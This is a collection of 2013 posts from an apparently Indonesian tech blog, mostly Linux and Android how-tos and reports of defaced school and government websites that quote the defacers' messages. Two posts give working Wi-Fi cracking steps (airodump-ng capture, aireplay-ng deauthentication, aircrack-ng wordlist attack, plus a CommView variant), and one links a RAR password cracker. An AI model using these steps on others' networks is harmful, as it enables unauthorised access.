Jumat, 30 Agustus 2013

Website Sekolah SMK Yadika Bangil di Hack

Hacker kembali lagi beraksi, kali ini sebuah website sekolah di daerah bangil kabupaten pasuruan jawa timur, pada alamat http://smkyadika.sch.id/main/?pg=sambutan hingga berita ini dibuat pada tanggal 30-08-2013 sekitar pukul 20:00 WIB keadaan website tersebut masih dalam kontrol seorang hacker yang menyebut dirinya phiA

Memang, seorang hacker tidak pernah berhenti untuk mencari kelemahan sistem keamanan pada sebuah website, dan menjadi Black Admin di dalamnya, seorang hacker dapat dengan mudah mengambil data dan memanipulasi data sesuai dengan yang mereka inginkan, baik itu berupa kepentingan pribadi atau golongan, bisa juga hanya sekedar hobi.

di bawah ini adalah hasil screenshoot yang berhasil localtechno ambil :


Hacked by phiA feat Ipan

Kami mengucapkan selamat ulang tahun buat mas h3ll0s semoga cepat kawin biar gak ngejoomla terus =))
greetz : inspiron , 541 aka GL , rifky mocha , i3r_c0de dll  

  we are -:: Pasuruan Cyber and Pasuruan BlackHat Crew ::- we are not deleted any data , hy admin ? u wanna know you'r bugs ?
 belikan saya samsung galaxy S III dulu , nanti akan saya kasih tahu bugs nya dimana :D #peace

Kita dapat mengambil hikmah dari kejadian ini dan menjadikannya sebuah motivasi untuk lebih meningkatkan kualitas dan kuantitas sistem keamanan pada sebuah website, terutama website sekolah dan pemerintahan.

Selasa, 27 Agustus 2013

Cara mudah disable Guest Session di linux atau ubuntu

Guest Sesion adalah salah satu session yang free tanpa pasword yang ada pada ubuntu atau linux, saat anda menginstall linux maka guest session tersebut sudah terinclud secara default pada session menu login ubuntu atau linux, nah jika anda tidak mendisable guest sesion ini maka orang lain pun bisa masuk dengan mudah melalui guest session yang tidak terdapat kode securitya.

okey tidak perlu panjang lebar lagi di bawah ini adalah cara untuk mendisable guest session tersebut :

# Pertama, buka terminal sobat dan masuk sebagai root dengan perintah sudo su dan masukkan pasword sobat

# Kedua, Ketik pada terminal sobat perintah berikut ini :  nano /etc/lightdm//lightdm.conf
akan terlihat scrip seperti di bawah ini :


tambah kan " allow-guest=false " tanpa tanda petik di baris paling bawah sendiri kemudian tekan CTR+X jika di tanya anda ingin menyimpan setting tersebut ketik Y pada keyboard sobat, kemudian enter.

Restart komputer sobat dan lihat hasilnya.....

okey terima kasih sudah mampir dan semoga bermanfaat...... : )

Senin, 26 Agustus 2013

Cara install chromium di ubuntu atau linux xfce

Cara yang mudah sekali untuk menginstall alat browser anda salah satunya adalah chromium yang memang sudah di sediakan untuk linux atau ubuntu. Jika anda adalah pengguna baru linux anda tidak perlu bingung untuk install browser chromium ini.

di bawah ini adalah beberapa kelebihan dan kekurangan google chrome yang mungkin bisa anda jadikan alasan kenapa anda ingin menggunakan browser chrome, refrensi ini localtechno ambil dari yahoo answer.

>> Keunggulan Google Chrome :

1. Chrome lebih cepat memuat halaman web dibanding Firefox.
2. Desain antarmuka yang simpel dan minimalis.
3. Pengaturan yang simpel, memudahkan penggunanya.
4. Saat terjadi crash dengan halaman yang dimuat, Chrome memberitahu halaman mana saja dan memberi pilihan menunggu atau menutup halaman tersebut. Pada Firefox , selain menunggu, kita harus
menutup program Firefox dan memulai lagi, tentu ini membuat kita kesal.

5. Bantuan & Dukungan tersedia dalam versi Bahasa indonesia.
6. Tersedia terjemahan otomatis yang terintegrasi.
7. Memiliki pengaturan untuk masing-masing pengguna. Ini menjaga kerahasiaan dan menyesuaikan pengaturan antar pengguna.

>> Kekurangan Google Chrome :

1. Saat beralih ke tab lainnya (yang sudah terbuka halaman web) yang lama tidak di buka, Chrome lambat untuk menampilkannya. Mungkin ini berkaitan dengan memori yang diperlukan cukup besar.

2. Sering error pada halaman web yang dimuat, dan memberikan data yang salah pada halaman web. Misalnya yang sering saya alami saat bermain catur online, bendera merah putih yang saya sorot akan menampilka keterangan �Inggris�, sedangkan bendera Inggris akan menampilkan �Indonesia�, kesalahan menampilkan rating saya dan lainnya.

anda hanya perlu membuka ubuntu software center dan pada kotak searh, anda hanya perlu mengetik chrome dan pilih chromium kemudian klik install. tunggu hingga proses selesai dan andapun bisa menikmati penjelajahan internet dengan kecepatan max di chromium.

Selamat mencoba dan semoga bermnfaat.... : )

Minggu, 25 Agustus 2013

How to Change Display Samsung Galaxy Young GT-S5360 to [ROM] Pure GT-XPERIA U

A view has always been an interesting thing for the Android platform users.
But is it possible if we change our samsung galaxy young to look like xperia ..? what the heck is not possible, we can change the look of Android samsung galaxy young if you follow the tutorial below.

Let's look together :

first download the following three files :

>> DOwnload ROM 
>> DOwnLOad PACTH 
>> DOwnLOad GT S5360 CWM 

@ and then follow this step : 
for boot recovery mode
Volume + Home + Power [Together]

  1. >> The third copy of the file to the sdcard buddy "do not put in the folder".
  2. >> Boot into Recovery mode.
  3. >> Select Mounts and Storage.
  4. >> Choose Format / System. 
  5. >> When finished, select Mount / System.
  6. >> select the Back button.
  7. >> Then delete Data and Cache.
  8. >> Select to install zip.
  9. >> Search ROM and select Yes when asked
  10. >> When finished, Reboot.
  11. >> Shut down, boot back into recovery mode.
  12. >> After that install Patch.
  13. >> Reboot and done.
    good luck ... :)

Jumat, 23 Agustus 2013

[Pinta Image Editor] alternatif edit gambar untuk ubuntu atau linux

Pinta image editor adalah salah satu aplikasi pengola gambar pada linux atau ubuntu, aplikasi ini sangat sederhana dan mudah untuk di gunakan, cocok bagi anda untuk menjadikan sebuah alternatif pengganti photoshop.

Jika kita menggunakan linux maka kita tidak bisa menginstall photoshop dengan begitu saja, karena kita harus menginstall wine terlebih dahulu setelah itu kita bisa install photoshop di ubuntu, itu pun saya yakin bahwa kinerja photoshop tersebut tidaklah maksimal, jadi saran saya lebih baik anda install saja pinta image editor ini sebagai pengganti photoshop.  

okey tidak perlu panjang lebar berikut adalah bagaimana cara install pinta image editor pada ubuntu [solusi edit gambar di linux atau ubuntu] :

>> Pertama Open terminal ubuntu sobat
>> ketik : sudo apt-get install pinta kemudian enter

tunggu hingga proses selesai dan anda pun bisa menjalankan pinta serta melakukan kreatifitas edit gambar pada linux atau ubuntu. MUdah bukan, semoga bermanfaat dan terima kasih sudah mampir di localtechno.

How to Look password wifi or WPA2 with linux backbox 2013

It sounds a bit silly when I forgot the password to my wifi, this is what I do, with its own password guessing that I have created.

1. entered at the terminal as root

>> in terminal write this command :

Note : This tutorial was made, not to destroy and break passwords aimed wifi someone who is not our right, this tutorial is made just for learning activities and when you're in desperate need, Use it wisely.

1. airmon-ng
2. airmon-ng start wlan0
3. airodump-ng mon0

and then write command bellow :

4. airodump-ng --channel 1 --write output --bssid 64:70:02:E5:F8:28 mon0

let it run and open a new terminal, and then type the following command :

5. aireplay-ng --deauth 1 -a 64:70:02:E5:F8:28 -c CC:AF:78:54:05:A3 mon0

6. aircrack-ng output-01.cap -w /root/wordlist or aircrack-ng output-02.cap -w /root/wordlist

wordlist is a data set to WPA2 password guessing, because it is in need patience to find out which type of password security WPA2. so you can match the WPA password degan data set that you have got.

well now i can use my internet connection back..... 

Note : This tutorial was made, not to destroy and break passwords aimed wifi someone who is not our right, this tutorial is made just for learning activities and when you're in desperate need, Use it wisely.

Kamis, 22 Agustus 2013

How to make windows look like ubuntu effect compiz

This time localtechno will discuss about, how to order windows we have a similar effect compiz ubuntu or linux easily and quickly.

well if we are a windows user then we will feel bored if we only display windows look monotonous, so there needs to be a little touch that our windows look more attractive.

okey do not need to elaborate, lets go to the scene :

First, download the application here
second, install windows fx app that you dowload earlier, wait for it to finish, then run the patch, click save license, then click the patch and select the tab menu and then select random animation animations.

well now you can enjoy your windows with compiz effects like on linux.
see picture below :

thanks for coming.... :)

keywords :
how to make windows look like Gell effect on ubuntu, how to make Gell effect on windows, how to install and configure windowsfx, how to create a burn effect on windows 7 and windows 8, how to easily make effect on windows.

Rabu, 21 Agustus 2013

Easy cracking password rar in windows 8 64bit or 32bit

would be so upset if we download a rar file and it can not be opened because of a forgotten password or other. This time you do not need to be confused, you only need to download and install the following applications :
rar unlocker
after you have finished downloading it and extract the rar file
copy and paste urpwdr11rc16 in C: Program Files / Intelore / RAR-PR

then run with click open and select the desired zip file, then click start.
If the process is successful it will look like d image below :

okey until here before, may be useful.

Senin, 19 Agustus 2013

Website Resmi Pengadilan agama di Hack

Situs web Pengadilan Agama Rembang Indonesia yang beralamat pada http://pa-rembang.go.id/readme.html telah di hack oleh hacker, hingga berita ini dibuat pada 19/08/2013 sekitar pukul 22:00 WIB situs tersebut masih di bawah kendali hacker.

tentu sangat rentan sekali, karena sebuah situs penting milik pemerintah dapat dengan mudah di bobol oleh hacker, di mana hacker dapat keluar dan masuk serta dapat mengambil data penting pada website tersebut, serta dapat pula memanipulasi data yang ada di dalamnya.

dibawah ini adalah hasil dari sreenshoot yang berhasil localtechno ambil :


>> Berikut ini adalah pesan yang tertulis pada website tersebut :

Ini adalah dunia kami sekarang Dunia-nya elektron dan switch dan keindahan sebuah baud.
Kami ada tanpa paham kebangsaan, perbedaan warna kulit, atau prasangka keagamaan.
Anda memproklamirkan perang, membunuh, dan berlaku curang, dan membohongi kami serta meyakinkan bahwa ini adalah untuk kebaikan kami, namun tetap saja kami disebut kriminal.

Ya ... saya adalah seorang kriminal.

Kejahatan saya adalah rasa ingin tahu.
Kejahatan saya adalah LEBIH PINTAR dari kalian, sesuatu yang
tidak pernah kalian harapkan.
Saya adalah seorang HACKER, dan ini adalah MANIFESTO-ku
Kalian bisa menghentikan saya, tapi tidak akan pernah dapat
menghentikan kami semua. ...

Disini kami membuktikan bahwa system yang dimiliki oleh situs ini memang bolong, kebolongan itu kami manfaatkan untuk kepentingan kami. Anda salahkan kami yang meruksan situs ini? SILAHKAN..!! Jika memang anda selalu menyalahkan hacker maka tidak ada timbal balik kemajuan IT di dunia ini, Kami merusak bukan karena kami perusak, tapi kami ingin system yang anda miliki di perbaharui dan lebih baik lagi. Ingat...!! Data lebih penting di bandingkan dengan UANG..!! Anda bilang kami cuma heker yang tukang ngerusak dan ngedeface? maaf kami bukan seperti itu, kami manfaatkan kesalahan anda untuk penghasilan kami, jadi berhati hatilah jika kami datang lagi jika system yang anda gunakan masih bolong seperti ini

my family :zer0cool | nacomb13 | direxer | uzanc | arulz | blackboy007 | febi | mr.at | nobita_chupuy | pendekar_chupuy | ejh-03 | gondrong | guard | joniae | yudie | cah_kentir | riadho | ipunk | vqi | baagus | gesna | gigih | rangga | rani | samsuri | suhell | mpie | bowo | ferr | enggar | ade |

by www.code-security.com

mudah-mudahan dengan ini menjadi pelajaran bagi kita semua dan dapat mengambil hikmah dalam peristiwa tersebut, serta mencoba untuk meningkatkan sistem keamanan pada sebuah website, terutama website pemerintahan.

Minggu, 18 Agustus 2013

cara membuat tampilan ubuntu terlihat seperti mac os

Membuat sebuah tampilan ubuntu agar terlihat lebih menarik sehingga dapat membuat kita lebih betah berlama-lama menataplayar monitor komputer sobat apalagi bagi para pengguna linux.
okey tidak perlu panjang lebar langsung aja kita menuju ke TKP :

Di bawah ini adalah susunan cara membuat ubuntu anda agar terlihat seperti Mac Os atau dengan Rasa Mac OS x :

1. install cairo dock nya dulu
Open terminal sobat dan ketik perintah dibawah ini :

>> sudo add-apt-repository ppa:cairo-dock-team/ppa
>> sudo apt-get update
>> sudo apt-get install cairo-dock cairo-dock-plug-ins

log out dan pilih salah satu session di ubuntu anda, contoh : cairo dock with gnome, cairo dock with gnome classic, cairo dock with unity panel, kemudian pilih dan login

2. install mac os lion icons, cursors, dan window gtk themes.

>> sudo add-apt-repository ppa:noobslab/themes
>> sudo apt-get update
>> sudo apt-get install mac-os-lion-theme mac-os-lion-cursors mac-os-lion-icons

dan sekrang install Advance Settings pada ubuntu anda dengan cara masuk pada ubuntu software center dan ketik advanced settings, kemudian pilih dan install. Setelah terinstall buka advanced setting tersebut dan pilih tema mac.

3. kemudian install plymouth atau bisa juga di sebut dengan logo windows ketika kita menyalakan komputer.

Download dulu Paw-OS X Plymouth theme

kemudian masuk dengan perintah : sudo nautilus "diterminal"
Extract, copy dan paste pada  �/lib/plymouth/themes/�

istall dan gunakan tema tersebut dengan perintah berikut :

>> sudo update-alternatives --install /lib/plymouth/themes/default.plymouth default.plymouth /lib/plymouth/themes/Paw-OSX/paw-osx.plymouth 100
>> sudo update-alternatives --config default.plymouth
pilih Paw-OSX
kemudian ketik :
>> sudo update-initramfs -u

Okey selamat menikmati tampilan baru Linux Rasa Mac OS anda, semoga bermanfaat dan terima kasih sudah mampir.. :)

Polinema Malang, Indonesia, Launch Electric Car

Students Polinema Malang, East Java, Indonesia, finally able to show his achievements with the assembly of an electric car. This time the electric car or motrik, launched by students of the Polytechnic of Malang (Polinema) with the name of the electric car (motrik) Generation 1 Tunas Polinema, on Saturday 17-8-2013.

This car looks a little unique, when viewed from the design is similar to frogs. According to the Chairman of the Tunas Motrik Polinema, Nur Jachin, said, that the car is able to cover a distance of 40 km with a speed of 20 km / hour.

"If development has only taken six months and cost Rp 45.000.000, or 4320.00 U.S. Dollars, Also this car also won the national championship favorite student achievement, Kemendikbud." He said.

then, motrik is considered still many shortcomings, especially on the severity. "The car is too heavy, therefore, speed is only 20 km / hour. We will develop further so that more light and fast, "he added.

Meanwhile Polinema Director, Ir Tundung Vali Patma MT, said Polinema always respond to the demands of the nation through research. "Students should continue to develop risetya. Motrik is one of them. Will have to be made such as the Honda Jazz, "he said.

Sabtu, 17 Agustus 2013

Cara mudah install youtube-dl di linux atau ubuntu

Untuk pengguna linux, bila agan kesulitan untuk mendownload link youtube, disini ada solusinya gan...
cukup mudah dan simple, agan cuman tinggal buka terminal agan dan ketik perintah di bawah ini :

sudo add-apt-repository ppa:nilarimogard/webupd8
sudo apt-get update
sudo apt-get install youtube-dl

setelah agan install youtube-dl sekarang tinggal bagaimana agan mencoba mendownload video di youtube nah... ini ni caranya :

pada terminal ketik perintah berikut :

youtube-dl -F (paste url pada youtbe yang agan ingin download) 

contoh :

root@blackiT:~# youtube-dl -F http://www.youtube.com/watch?v=88GnBdzEQEc
[youtube] Setting language
[youtube] 88GnBdzEQEc: Downloading video webpage
[youtube] 88GnBdzEQEc: Downloading video info webpage
[youtube] 88GnBdzEQEc: Extracting video information
Available formats:
34 : flv [360x640]
18 : mp4 [360x640]
43 : webm [360x640]
5 : flv [240x400]
17 : mp4 [144x176]

stelah itu pilih format video yang ingin agan download :
biasanya yang paling atas sendiri itu adalah kualitas video youtbe yang bagus atau berkualitas tinggi
setelah agan sudah menentukan pilihan format youtube kemdian ketik :

youtube-dl -f34 (paste url pada youtbe yang agan ingin download) dan enter

root@blackiT:~# youtube-dl -f34 http://www.youtube.com/watch?v=88GnBdzEQEc
[youtube] Setting language
[youtube] 88GnBdzEQEc: Downloading video webpage
[youtube] 88GnBdzEQEc: Downloading video info webpage
[youtube] 88GnBdzEQEc: Extracting video information
[download] Destination: ???????????:???????????????????????-88GnBdzEQEc.flv
[download]   0.0% of 345.77MiB at 11.31KiB/s ETA --:--

tunggu hingga proses download selesai dan selamat menikmati video hasil download nya...
thanks for coming... :)

cara mudah install compiz atau effect gell pada linux

compiz adalah salah satu aplikasi tambahan pada linux untuk membuat tampilan linux lebih terlihat menarik dan mempunyai effect yang bisa membuat anda betah berjam-jam menatap layar komputer anda, pecinta linux tentu tidak akan meninggalkan aplikasi yang satu ini, karena jika anda pengguna linux namun pada PC atau laptop anda tidak terinstall aplikasi tersebut maka akan terasa kurang lengkap.

Dengan aplikasi ini anda bisa mengaktifkan beberapa effect sepeti berikut :
effect gell pada windows
effect air pada corsor
effect slide pada active windows
effect burn atau terbakar saat anda close active windows anda

Nah sekarang bagaimana cara kita menginstallnya....??
berikut adalah bebrapa tahap cara menginstall compiz ini :

Pertama Sobat buka dulu terminal ubuntunya dan ketik
sudo su dan masukkan pasword ubuntu atau linux anda

setelah itu ketik :

sudo apt-get install compizconfig-settings-manager compiz-plugins-extra

atau anda juga bisa masuk pada ubuntu software center kemudian ketik compiz pada pencarian atau serach kemudian cari compiz tersebut dan install.

okey gitu aja ya... semoga bermanfaat dan jangan berputus asa bila anda baru saja menggunakan linux dan tetap semangat.... : )

Kamis, 15 Agustus 2013

How to easy rooting handphone android

Root is the super user on Linux Operating System. Android is a Mobile Operating System based on Linux kernel. A root user permissions to the highest level, as well as Administrator on Windows Operating System. But in android, root user is not given to users by default.

okey no need to elaborate more ...

The first step you should do is to download the following file:

>>> Root-android.zip in here : http://adf.ly/TvKfp

>> Then after you download, extract update.zip to the sd card. In this case, you do not put it into a folder. Enough on sdcard only

>> Turn off your Android phone

>> Then go into recovery by pressing the Home and Power buttons simultaneously (or: volume (up) home power button simultaneously)

>> After that, select the option "apply from sd card". To memnidahkan cursor you can not use the touch screen, use the volume up / down

>> Then select the file that you have entered into sd card earlier by pressing the Home button

>> Reboot and check what no superuser app in the menu, and if your phone is already successful in the root

good luck

Rilis terbaru dari BackBox Linux Versi 3.05

The BackBox Tim dengan bangga mengumumkan rilis terbaru dari BackBox Linux, versi 3.05. Rilis ini mencakup fitur seperti Linux Kernel 3.2, compat-wireless 3,8 (dengan Aircrack-NG patch) dan Xfce 4.8.

Gambar ISO (32bit & 64bit) dapat didownload dari lokasi berikut:


>> Apa yang baru

perbaikan sistem
komponen hulu
koreksi bug
meningkatkan kinerja
Peningkatan menu Pembaruan
Peningkatan Wi-Fi driver (compat-wireless v3.8 dengan patch yang Aircrack-NG)
Dukungan penuh kepada Kernel 3.5 dan 3.8 (menginstalnya dengan apt-get/synaptic)
Kecenderungan untuk arsitektur ARM (baru armhf.iso segera hadir)
Baru dan diperbarui hacking tools (automater, inundator, ettercap, wireshark, se-toolkit, metasploit, sqlmap, daging sapi, rekonstruksi ng, zaproxy, weevely, THC-ipv6, truecrack, hashcat, dll)

>> persyaratan sistem

32-bit atau prosesor 64-bit
512 MB memori sistem (RAM)
4,4 GB ruang disk untuk instalasi
Kartu grafis mampu resolusi 800 � 600
DVD-ROM drive atau port USB


Selasa, 13 Agustus 2013

Georgia government website chm.moe.gov.ge has been hacked

Georgia government website which is located at http://chm.moe.gov.ge/webmill/data/x.txt have been compromised by hackers and security system until the news was made, at approximately 15:00 11-08-2013 WIB website is still under the control of hackers.

certainly very vulnerable, because an important website owned georgia government target, where a hacker can get in and out can take an important data in our computer servers, security by hacking on a website and enter in it.

Below are the results of a successful shoot localtechno screen grab :


>> The following is a BRIEF message written on the website :

Pwn | JIGsaw

The only posts that localtechno get when trying to access one of these websites georgia government on 11-08-2013 about 15:00 pm 

who knows what the motive that drives hackers, hopefully this becomes a lesson for us all, and try to improve the security system on a website, especially the government websites.

Senin, 12 Agustus 2013

Argentina Government website comunadealcorta has been hacked

Hackers back again in action, this time the target is argentina government website, the address http://www.comunadealcorta.gov.ar/ until the news was made ??on 11-08-2013 at about 11:00 pm The website is still under control by a hacker who calls himself TUNOVATO

Indeed, hackers never stop to look for security weaknesses of a system of websites, especially important government websites, hackers can easily manipulate the data in and out and in accordance with what they want, whether it be personal or group interests and maybe just a hobby.

Below are the results localtechno sreen shoot while trying to visit the website :


>> and the following is a message written on the website:

Lo siento Admin tienes un Fallo de seguridad ...!
Mi Delito: La curiosidad ...!
Por eso no me acuses, Simplemente es tu y no la mia culpa ...!
Sovereignty is the right of the people to elect their government, its laws and it is respected ...!
Capitalist Corrupt Government ...!

The Revolution has come to stay ...!

Copyright � 2013 TuNoVaTo. All Rights Reserved
this will continue ..!

hopefully will be fixed soon returned and tried to improve the security system on the website and meningatkan security system anyway, because it is very vulnerable at all, let alone on the government website.

Minggu, 11 Agustus 2013

How to make a related post on blogspot

>> first

  • Login To Blogger
  • At Dshboard select Templates
  • Then click the edit HTML
  • In the template edit Find codes </ head> Use Ctrl + F to find the code.
  • Copy Paste below code then place it right above the </ head>

<style> #related-posts { float : left; width : auto; margin-top:20px; margin-left : 5px; margin-bottom:20px; font : 11px Verdana; margin-bottom:10px; } #related-posts .widget { list-style-type : none; margin : 5px 0 5px 0; padding : 0; } #related-posts .widget h2, #related-posts h2 { font-size : 20px; font-weight : normal; margin : 5px 7px 0; padding : 0 0 5px; } #related-posts a { text-decoration : none; } #related-posts a:hover { text-decoration : none; } #related-posts ul { border : medium none; margin : 10px; padding : 0; } #related-posts ul li { display : block; background : url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzazGtuwa_-HcLfHdHEHtKILJeBFQkZUeKiDZvxxNA7cw8wgb9ly94C45OqW426rBBk3HtNSAzi2rJZIrBsCh1nNJY6K9zYdu5QF9dmubo5zgTK9RkPKRb_2KJKB0-kGqUNpR3ozRxpI8S/s1600/rss.png") no-repeat 0 0; margin : 0; padding-top : 0; padding-right : 0; padding-bottom : 1px; padding-left : 21px; margin-bottom : 5px; line-height : 2em; border-bottom:1px dotted #cccccc; } </style> <script src='https://sites.google.com/site/alvizcybercom/javascript/ALviz%20Related%20Post02.js' type='text/javascript'/>

>> The second step
  • Copy Paste below code then place it right below the <data:post.body/>

<b:if cond='data:blog.pageType == "item"'>
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Weakness on WEP,WPA and WPA2 PSK

@ Weakness on WEP (Wired Equivalent Privacy)

>> Problem of weak keys, RC4 algorithm used can be solved.
>> WEP uses static keys
>> Problem initialization vector (IV) WEP
>> Message integrity issues Cyclic Redundancy Check (CRC32)

WEP consists of two levels, namely 64-bit key, and 128 bits. Actually, the secret key in the WEP key 64 bit only 40 bit, 24bit is Initialization Vector (IV). Similarly, the 128-bit WEP key, secret key consists of 104bit.

Attacks on WEP weaknesses include:

Attacks on the weaknesses of the initialization vector (IV), often called the FMS attack. FMS stands for the names of the inventors of the IV weakness Fluhrer, Mantin, and Shamir. This attack was carried out by collecting a weak IV sebayak possible. The more IV
weak obtained, quickly found the key that is used

Get a unique IV data obtained through packet to be processed by cracking the WEP key process faster. This method is called chopping attack, first discovered by h1kari. This technique only requires a unique IV thus reducing the need for IV weak in WEP cracking.

Both attack and take over the packet, to shorten the time, the hackers usually do traffic injection. Traffic Injection is often done with the way the ARP packet and send it back to the access point. This resulted in the collection of initial vectors is easier and faster. Unlike the first and second, for traffic injection attacks, required specification of tools and applications that start rarely found in stores, ranging from chipsets, firmware version, and the version
driver, and not infrequently have to do patching of drivers and applications.

@ Weakness on WPA (Work Projects Administration) or WPA2/WPA2 PSK

The only drawback WPA2 psk and wpa is when a client connects to the AP where the handshake process, we can do the Force Gross will try one by one with a password that is obtained from the handshake. Doing Gross Force is done by using dictionary file, which means we should have a file that contains passpharase will try one by one with a handshake packet to find the keys that are used or can be called with a wordlist.

Sabtu, 10 Agustus 2013

vietnam government website vspa has been hacked

Hacked by Dr.SHA6H so when you visit the government website at www.vspa.gov.vn vietnam until the news was made ??on the date 07-08-2013 at approximately 11:30 pm, the state of the website is still under the control of a hacker who calls himself this Dr.SHA6H.

index on the website is hacked, the hacker put a video file of a child who was severely injured and is being treated, very touching at all when I saw the video, and try to imagine if it happened to you, what do you feel? hopefully not.

who knows what the motive that drives hackers, but you can see for yourself on www.vspa.gov.vn address if still not fixed.

Below are the results of a successful screen shoot localtechno get when trying to access the website :


or this mirror : www.zone-h.org/mirror/id/20434133

we can take a lesson from the events that have happened and are trying to improve a website's security system, especially on the government website.

Jumat, 09 Agustus 2013

Chinese government website zfxxgk has been hacked

Hacked by SultanHaikal so when you go to a Chinese government website at http://xw.zfxxgk.gov.cn/sunnah.htm until the news was made ??on the date 07-08-2013 at approximately 07:30 pm, a state website is still under the control of a hacker on the website address tab.

lucky not index on the website is hacked, the hacker can just put the file on the tab sunnah.htm that in her own, yet still very dangerous if the conditions hacked by hackers, because a hacker could be in and out as they pleased with the website they, like their own.

who knows what the motive that drives hackers, but you can see for yourself at the address http://xw.zfxxgk.gov.cn/sunnah.htm if still not fixed.

below are the results of a successful screen shoot localtechno get when trying to access the website :


Ahlussunnah Was Here! 
Anti Shia , Anti Zionist (Jewish)
#Free Syria ! #antigovernment #FvckShia 

with this incident we can take a lesson and try to improve the security system on a website, primarily on government websites.

Rabu, 07 Agustus 2013

Turkish government website duzceelsanatlari has been hacked

Hacker back in action again, this time in the Turkish government website defacement is, at the address http://www.duzceelsanatlari.gov.tr/ until the news was made ??on 06-08-2013 at approximately 15:00 pm a state website is still in control by a hacker who calls himself CrAzY_Dz

Indeed, a hacker never cease to look for a weakness in the security system websites, especially important government website, a hacker can easily retrieve data and manipulate the data in accordance with what they want, whether it be personal or group interests and maybe just a hobby, to seek weaknesses security systems.

is very important to pay attention to the security system in a website, because with diretasnya security systems, hackers can go out with as he pleased on our server computers, such as their own.
Below are the results localtechno sreen shoot when visiting the website :

[ ! ] HaCkEd By CrAzY_Dz [ ! ]

Security => 0%

hopefully it will fast for diperbaikai back and try to improve the security system on the website, because we can take a lesson in this incident, and trying to be better.

Selasa, 06 Agustus 2013

Philippines government website bukidnon has been hacked

Philippines government website which is located at [http://www.bukidnon.gov.ph/x.htm] has compromised its security system by hackers and until this news was published, at approximately 15:00 pm 06-08-2013 the website is still under the control of a hacker.

This course is very vulnerable, because a website is very crucial especially a government website, which is where a hacker can get out into the computer our server, security by hacking on a website.

Below are the results of our successful screen shoot took while trying to visit the website :


# The following is a message on the website :

[#] Your System Owned by TheHackersArmy (THA) by Shadow_Haxor!

[#] Philippine h4x0r was here ^ _ ^

[#] Where is the security?

[#] Do not worry i just test your security! : P

[#] Greets: Rude THA - THA Disaster - THA X HaxOr - Cronos Ip THA - THA Shadow_Haxor - THA Rox Root - Kjubi THA - THA Ex Leet - Dark THA - THA Optimizer - THA Rooter
Madleets - And specially to my Computer <3

This may be a lesson to us all, in order to improve the security system on a website, especially the government websites.

Senin, 05 Agustus 2013

kristinasalin website has been hacked by Maniak k4sur

Indonesian hacker back in action by looking for weaknesses in the security of a website. This time kristinasalin website hacked by [Maniak k4Sur] on 05-08-2013 at approximately 14:04:03 until this news was published, the website is still under the control of a hacker [Maniak k4Sur]

if you look at the address http://kristinasalin.com you will see an image that are added by the hacker, when I tried to get in on the gallery tab or the other, turned the page on the point on the page that has been added by the hacker [Maniak k4Sur] this.

The following is a screen shoot that I managed to take when visiting the website :


! Maniak K4Sur w4s here !

or you can look in mirror http://www.zone-h.org/mirror/id/20429859

no message 
whether the motive is what drives hackers to deface the website kristinasalin.

but with this event we can take a lesson and try to improve the security system on a website.

How to use commview and aircrack-ng in Windows 8 64bit or 32bit

Back again with localtechno

Okey buddy localtechno this time I will give you a little tutorial about, How to use commview and aircrack-ng in Windows 8 64bit or 32bit for Cracking Password Wifi [I hope you use this tutorial wisely and in a state of urgency or at the time of need]

Okay we headed straight to the scene:

First download and install CommView for wifi, which can be downloaded at : here
and install aircrack-ng for windows 8 if you do not already installed on your computer aircrack-ng you can read How to install Aircrack-ng in Windows 8 64bit or 32 bit
after all you done a good installed CommView for wifi and aircrack-ng it is time for action :
run CommView for wifi and clik capture, you can look this picture bellow :

# and click start capture and then click capture :

# wait until get the +- 50.000 packet 

# after finish, in the tab program commview you can look logging and save the capture :

# Type for save = .cap look this picture bellow :

# after your save the capture, now run aircrack-ng gui.exe in folder c:\aircrack\bin\aircrack-ng gui.exe

choose your file capture, example my file is try1.cap and in tab wordlist choose pasword.list in c:\aircrack\test\pasword.lst and check in tab ESSID and includ name your target.
and then click launch...  

I hope you use this tutorial wisely and in a state of urgency or at the time of need.
and i hope you enjoy read this tutorial. Thanks for coming.... :)